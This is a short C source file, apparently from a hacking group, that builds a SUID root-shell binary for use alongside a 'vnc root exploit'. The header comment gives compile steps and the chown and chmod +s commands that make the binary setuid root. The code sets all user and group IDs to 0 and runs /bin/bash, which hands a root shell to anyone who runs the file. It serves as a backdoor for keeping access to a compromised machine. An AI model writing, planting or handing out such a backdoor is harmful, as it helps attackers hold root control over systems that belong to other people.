kek-getroot.c

1. /**
2. Modded for vnc-kek.sh vnc root exploit
3. d__F @ keksec.com
4. irc.anonops.com #blackhat
5.  
6. Build with:
7. gcc -Os -Wall getroot.c -o kek-getroot
8. strip --strip-unneeded kek-getroot
9.  
10. Then, as root:
11. chown root:root kek-getroot (to switch the owner of the file, so that suid bit will work)
12. chmod +s getroot (this set the suid bit)
13.  
14. man sh -c for info on -c parameter.
15.  
16. By the way, since we're using execvp, you can execute another
17. program via the root shell like this:
18. ./kek-getroot -c id
19.  
20. If you want a static executable (to make a non dynamic executable, no
21. .so dependencies), add a flag -static to the gcc command.
22.  */
23.  
24. #include <unistd.h>
25. #include <sys/types.h> 
26. #include <grp.h>   
27. #include <stdio.h> 
28.  
29. int main (int argc, char** argv) {
30.  
31.   gid_t newGrp = 0;
32.   if (setuid(0) != 0) {
33.     perror("SETUID failed! No SUID-bit set? :(");
34.     return 1;
35.   }
36.   setgid(0);
37.   seteuid(0);
38.   setegid(0);
39.   setgroups(1, &newGrp);
40.   execvp("/bin/bash", argv);
41.   return 0;
42. }